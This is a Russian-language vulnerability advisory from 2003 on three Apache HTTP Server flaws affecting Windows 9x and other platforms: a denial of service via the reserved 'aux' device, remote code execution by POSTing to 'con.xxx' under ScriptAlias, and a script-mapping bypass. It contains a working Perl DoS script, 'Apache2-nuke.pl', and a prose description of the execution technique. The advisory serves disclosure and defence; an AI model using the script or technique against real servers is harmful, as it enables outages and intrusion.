Дата публикации: | 24.01.2003 |
Всего просмотров: | 1858 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Apache HTTP Server содержит несколько уязвимостей, связанных с выполнением подпрограмм, которые позволяют атакующему заставить Apache сервер неправильно обрабатывать файлы, что может привести к зависанию всей системы или удаленному выполнию произвольного кода. 1. Удаленный DoS (VU#979793) Уязвимость связанна с ошибочными регистрациями в функции ap_directory_walk и воздействует на Windows 9x системы, на которых выполняется Apache Web сервер. Отказ в обслуживании может быть вызван при запросе зарезервированного DOS устройства, типа "aux": --- Apache2-nuke.pl --- #!/usr/bin/perl use IO::Socket; if (@ARGV < 1 || @ARGV > 2) { print STDOUT "Usage: perl $0 <host> <port=80>"; exit; } if (@ARGV == 2) { $port = $ARGV[1]; } else { $port = 80; } $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], PeerPort=>$port); print $f "GET /aux HTTP/1.0\r\n\r\n"; --- Apache2-nuke.pl ---2. Удаленный root (VU#825177) Эксплуатация этой уязвимости позволяет удаленному атакующему получить root привилегии на уязвимой системе. Уязвимость затрагивает Windows 9x версии Apache сервера, и имеет ту же самую причину, что и предыдущая уязвимость. Когда данные передаются CGI сценарию (POST), stdin поток указывает на входные данные формы. Посылая POST к "con.xxx" в каталоге ScriptAlias, ваши POST данные будут выполнены CGI интерпретатором. 3. Обход заданного по умолчанию режима отображения сценариев(VU#384033). Эксплуатация этой уязвимости позволяет обойти заданный по умолчанию режим отображения сценариев. Уязвимость воздействует на Apache для всех платформ. Эта проблема лучше всего описывается примером: http://localhost/folder.php/file Apache должен анализировать 'file' как открытый текст - то есть просто возвратить его назад браузеру. Однако, неправильная проверка в алгоритме отображения Apache, свяжет 'php' расширение с этим запросом. Вместо того, чтобы проверить только расширение файла, Apache проверяет расширения в любом члене пути, останавливаясь на первом. Уязвимость обнаружена в Apache 1.3.х ( до 1.3.27) и Apache 2.0.х (до 2.0.43) |
Ссылки: | Path Parsing Errata in Apache HTTP Server |